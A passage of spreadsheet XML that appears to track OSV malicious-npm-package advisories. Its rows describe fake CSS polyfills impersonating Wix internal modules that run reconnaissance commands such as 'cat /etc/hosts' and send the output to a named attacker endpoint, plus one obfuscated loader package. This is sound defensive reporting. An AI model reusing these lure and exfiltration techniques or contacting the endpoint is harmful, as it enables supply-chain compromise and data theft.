      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17548</t>
        </is>
      </c>
      <c r="D82" s="5" t="inlineStr"/>
      <c r="E82" s="5" t="inlineStr"/>
      <c r="F82" s="5" t="inlineStr"/>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr">
        <is>
          <t>npm:css-ayucyz-polyfill</t>
        </is>
      </c>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr"/>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d8c7540d3981f510255434529f76a2ed9a24b0783e7e8e3369b41f71b93ebd1a)
On require, thunderboltRegistry.js runs an IIFE that acquires child_process via multiple fallbacks and executes shell commands (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts), then GETs the collected output along with the hostname, platform and Node version to the hardcoded plain-HTTP endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. One of the beacons is self-labeled beacon=rce-poc. The package presents itself as a CSS polyfill and exposes modules named thunderboltRegistry, siteAssetsRegistry, editorRegistry and corvidRegistry — internal Wix Thunderbolt names — behind a Proxy returning no-op functions, with registry-manifest.min.json pointing fake entries at a static.parastorage.com URL, so a consumer that resolves this package in place of the real Wix internals loads the exfiltration IIFE while the facade silently returns no-ops.
</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17548</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17549</t>
        </is>
      </c>
      <c r="D83" s="5" t="inlineStr"/>
      <c r="E83" s="5" t="inlineStr"/>
      <c r="F83" s="5" t="inlineStr"/>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr">
        <is>
          <t>npm:css-display-reading-polyfill</t>
        </is>
      </c>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr"/>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b397798b7209f1094c33dc3ed721d4a3ef0536065317bd06bae76e33dd505334)
The package ships payload.bundle.min.js, which on load runs an IIFE that invokes child_process.execSync to run id, whoami, and uname, collects os.hostname(), node version, process.platform, and pid, and transmits the results to the hardcoded collector https://webhook.site/5e52603d-f802-4a6f-b91b-43c3a5b45b6b via fetch and https.get. The published name impersonates an internal Wix thunderbolt module: shipped thunderbolt manifest JSON files declare this package as the loader entry for dozens of Wix component registry names (Container, StylableButton, MasterPage,...) and nine host registries (thunderboltRegistry, editorRegistry, corvidRegistry,...), with "shared":["payload.bundle.min.js"] and components mapped to that bundle. index.js is a benign stub; the exfil code lives entirely in the bundle, so any Wix runtime that resolves these internal registry names from this public package executes the host-reconnaissance payload. This is a dependency-confusion active attack: installer-side shell command output and host identifiers are sent to an attacker-controlled, non-first-party endpoint.
</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17549</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17550</t>
        </is>
      </c>
      <c r="D84" s="5" t="inlineStr"/>
      <c r="E84" s="5" t="inlineStr"/>
      <c r="F84" s="5" t="inlineStr"/>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr">
        <is>
          <t>npm:css-dwsawd-polyfill</t>
        </is>
      </c>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr"/>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1c370cda09695e44d06a44bc14d14817edadc047e4dad0314edcfc752be796e9)
The package name mimics a Wix thunderbolt polyfill and ships a registry-manifest.min.json that aliases legitimate @wix thunderbolt registry module names to thunderboltRegistry.js. On require, thunderboltRegistry.js runs an IIFE that uses child_process.execSync to execute shell reconnaissance (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts) and fetches http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f with the command outputs plus hostname, pid, platform, node version, and a site identifier as query parameters, tagged 'rce-poc'. A fallback path constructs a fresh Module instance to re-resolve child_process if the require cache is stubbed, ensuring execution. The destination is plain HTTP to an unrelated external host and is not caller-configurable.
</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17550</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17551</t>
        </is>
      </c>
      <c r="D85" s="5" t="inlineStr"/>
      <c r="E85" s="5" t="inlineStr"/>
      <c r="F85" s="5" t="inlineStr"/>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr">
        <is>
          <t>npm:css-gvqmfn-polyfill</t>
        </is>
      </c>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr"/>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ffb3f332a818748252e49dcf21ffb6949c531afd401ee697cc08ba00a067ae30)
css-gvqmfn-polyfill mimics Wix internal @wix/thunderbolt-* CSS polyfill naming and ships a Proxy-based cover stub that re-exports registry names (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.) as no-op functions to appear functional. On require of thunderboltRegistry.js, an IIFE unconditionally executes `id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and `cat /etc/hosts` via child_process, collects os.hostname, Node version, platform, and pid, and sends the output together with an `rce-poc` beacon to the hardcoded attacker endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f over plain HTTP. The accompanying registry-manifest.min.json points sibling registries to parastorage.com URLs that do not host this file, consistent with a dependency-confusion lure targeting Wix build environments.
</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17551</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17552</t>
        </is>
      </c>
      <c r="D86" s="5" t="inlineStr"/>
      <c r="E86" s="5" t="inlineStr"/>
      <c r="F86" s="5" t="inlineStr"/>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr">
        <is>
          <t>npm:css-hgwctv-polyfill</t>
        </is>
      </c>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr"/>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ee1103a16c6f933686f07e8ce94068057f49e5cf2f0a6a9ccf01f2baeb7cfe95)
On require, thunderboltRegistry.js runs an immediately-invoked function that uses child_process.execSync to collect host identity and network reconnaissance from the installer's machine (`id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and `/etc/hosts`), plus hostname, Node.js version, platform and pid, and transmits each result via fetch to the hardcoded plain-HTTP endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. The package also exports Proxy stubs named thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry and ships a registry-manifest.min.json referencing parastorage.com, mimicking internal Wix thunderbolt build modules so the module auto-loads inside a Wix build and executes the reconnaissance payload. A CSS polyfill has no functional reason to execute shell commands, read /etc/hosts, or contact an external host.
</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17552</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17553</t>
        </is>
      </c>
      <c r="D87" s="5" t="inlineStr"/>
      <c r="E87" s="5" t="inlineStr"/>
      <c r="F87" s="5" t="inlineStr"/>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr">
        <is>
          <t>npm:css-ikomdq-polyfill</t>
        </is>
      </c>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr"/>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (255cceca3ca8631c9b225745c5b64a71fd6c09b60fa3ad95b419fccb66f035f2)
The package presents itself as a CSS polyfill but ships thunderboltRegistry.js, which on require() executes a top-level IIFE that runs id, whoami, uname -a, ifconfig/ip addr, and reads /etc/hosts via child_process.execSync, then posts the command outputs together with hostname, node version, platform, and pid to the hardcoded plain-HTTP endpoint http://dxpoc.gt.tc/callback.php/ using fetch. The module also deletes its own entries from require.cache so the payload re-runs on each require() rather than being memoized. The package name and the thunderbolt/editor/corvid Proxy facade impersonate Wix parastorage registry modules to encourage accidental installation.
</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17553</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17554</t>
        </is>
      </c>
      <c r="D88" s="5" t="inlineStr"/>
      <c r="E88" s="5" t="inlineStr"/>
      <c r="F88" s="5" t="inlineStr"/>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr">
        <is>
          <t>npm:css-mpmdds-polyfill</t>
        </is>
      </c>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr"/>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4bac0cb0a2c693985668a890ff2ace72ff2d00dac60bc5470a77160c4d765106)
The package presents itself as a CSS polyfill but ships thunderboltRegistry.js which runs an IIFE at module load. The IIFE acquires child_process via multiple fallbacks (require('child_process'), require('node:child_process'), and a synthesized Module constructor), executes shell commands to collect host identity (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts) along with os.hostname, Node version, platform and pid, and transmits each result via fetch() as query parameters to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f over plaintext HTTP to a free-DNS (gt.tc) host unrelated to any CSS polyfill functionality. The IIFE also enumerates require.cache and deletes entries containing 'thunderboltRegistry' so the payload re-executes on every require rather than being memoized. registry-manifest.min.json maps multiple Wix/thunderbolt internal registry module names (siteAssetsRegistry.js, editorRegistry.js, and others) all to the same thunderboltRegistry.js payload mirrored on static.parastorage.com's unpkg mirror, consistent with a dependency-confusion / typosquat targeting the Wix thunderbolt ecosystem. The package stubs a Wix-ecosystem API surface via Proxy to appear functional while the exfil IIFE runs. The package name resembles a CSS polyfill but the shipped behavior is host reconnaissance and exfiltration with cache-busting evasion.
</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17554</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17555</t>
        </is>
      </c>
      <c r="D89" s="5" t="inlineStr"/>
      <c r="E89" s="5" t="inlineStr"/>
      <c r="F89" s="5" t="inlineStr"/>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr">
        <is>
          <t>npm:css-nbanqq-polyfill</t>
        </is>
      </c>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr"/>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7377a70c94f8fd1719147b2023860926935a70410f672e07411326284f11a69f)
The package impersonates Wix thunderbolt internal registry modules (exporting `thunderboltRegistry`, `siteAssetsRegistry`, `editorRegistry`, `corvidRegistry`, etc. and shipping a `registry-manifest.min.json` referencing static.parastorage.com) as a dependency-confusion lure. On require of thunderboltRegistry.js, a top-level IIFE uses child_process.execSync to run `id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and `cat /etc/hosts`, URL-encodes the output together with hostname, Node version, platform, and pid, and sends it via fetch to the hardcoded attacker endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. Proxy-wrapped stubs make the require() call appear to resolve normally while the exfiltration runs. Any build or runtime that resolves this package name will execute the reconnaissance payload and leak host identity and network configuration to the attacker-controlled host.
</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17555</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17556</t>
        </is>
      </c>
      <c r="D90" s="5" t="inlineStr"/>
      <c r="E90" s="5" t="inlineStr"/>
      <c r="F90" s="5" t="inlineStr"/>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr">
        <is>
          <t>npm:css-ogojwh-polyfill</t>
        </is>
      </c>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr"/>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (aff543635c832e0563229f42fcc7673c835f2ba5a9ae41d680aa572cfba49765)
css-ogojwh-polyfill@1.0.0 presents itself as a CSS polyfill but ships thunderboltRegistry.js which, on require, runs an IIFE that executes shell commands via child_process.execSync (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts) and POSTs their output along with hostname, Node version, platform and pid to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f, with a beacon label of `rce-poc`. The module also exports no-op Proxy stubs under module names matching Wix thunderbolt registry modules (thunderboltRegistry, siteAssetsRegistry, editorRegistry), consistent with a dependency-confusion / typosquat shim whose only real behavior is the recon-and-exfil payload executed at import time.
</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17556</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17557</t>
        </is>
      </c>
      <c r="D91" s="5" t="inlineStr"/>
      <c r="E91" s="5" t="inlineStr"/>
      <c r="F91" s="5" t="inlineStr"/>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr">
        <is>
          <t>npm:css-svqggc-polyfill</t>
        </is>
      </c>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr"/>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6b23cf39720388bcf9f26621bd52e256e18a011bf3b6821b7d9f5f60115b9663)
Package masquerades as a CSS polyfill while impersonating internal Wix Thunderbolt registry modules (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, and other namespace stubs), with a shipped registry-manifest pointing those names at parastorage.com URLs under this package's own name — a dependency-confusion shape. thunderboltRegistry.js runs an IIFE on require that purges its own entries from require.cache so each require re-runs the payload, obtains child_process via multiple fallbacks (including constructing a fresh Module instance to bypass sandboxed require stubs), and executes reconnaissance commands (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts) via execSync. The command output plus host beacon fields (node version, platform, pid, hostname, site) are sent over cleartext HTTP via fetch GET to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. The Proxy-based stub exports ensure the import appears to succeed silently after exfiltration.
</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17557</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17558</t>
        </is>
      </c>
      <c r="D92" s="5" t="inlineStr"/>
      <c r="E92" s="5" t="inlineStr"/>
      <c r="F92" s="5" t="inlineStr"/>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr">
        <is>
          <t>npm:css-txedrf-polyfill</t>
        </is>
      </c>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr"/>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7d70c660ff3138360df0239fc6ef3db7beaca61ca069bc2d108ed893c68acb63)
thunderboltRegistry.js executes an IIFE at require time that runs OS reconnaissance commands (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts) via child_process.execSync, URL-encodes the output together with hostname, node version, platform, and pid, and POSTs/GETs each result via fetch to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f over plain HTTP. The package's exported module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) impersonate Wix thunderbolt internal registry modules and the manifest references static.parastorage.com URLs, consistent with a dependency-confusion lure aimed at a private Wix namespace. Any consumer that requires one of these modules triggers the reconnaissance and exfiltration to the attacker-controlled host.
</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17558</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17559</t>
        </is>
      </c>
      <c r="D93" s="5" t="inlineStr"/>
      <c r="E93" s="5" t="inlineStr"/>
      <c r="F93" s="5" t="inlineStr"/>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-kex</t>
        </is>
      </c>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr"/>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b8fa212654344b734814cee2291c9b9b91ecbc353bde5e83740624ee5f263c69)
The npm package hardhat-kex@2.0.1 ships an obfuscated 4.5MB single-line bundle at lib/config.js (obfuscator.io-style string-array with a 26,234-entry table and numeric-dispatch wrapper, containing exec strings). The package main index.js unconditionally executes this bundle on require via `const config = require('./lib/config')`; the return value is never used, so the sole effect of importing the package is to run the obfuscated code. The surface API exported by index.js is an unrelated stub Express middleware that calls `next()`. The tarball additionally ships verbatim files from the pino logging library (lib/proto.js, levels.js, transport.js, worker.js, redaction.js, docs/, index.d.ts, README.md) despite the package being named for the Hardhat/Ethereum ecosystem and describing itself as a vulnerability-management tool; none of the pino sources are reachable through the exported API. The name/description/API mismatch combined with bundled pino cover-story files is a decoy pattern designed to make the tarball appear legitimate while the obfuscated loader is the only code that actually runs. Any project adding hardhat-kex as a dependency will execute the opaque payload on import.
</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17559</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17560</t>
        </is>
      </c>
      <c r="D94" s="5" t="inlineStr"/>
      <c r="E94" s="5" t="inlineStr"/>
      <c r="F94" s="5" t="inlineStr"/>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-spack</t>
        </is>
      </c>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr"/>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (e59c971c63de9d0a7f66c26093f528164990af10eca00a3a36b97d0c8b0a6d0d)
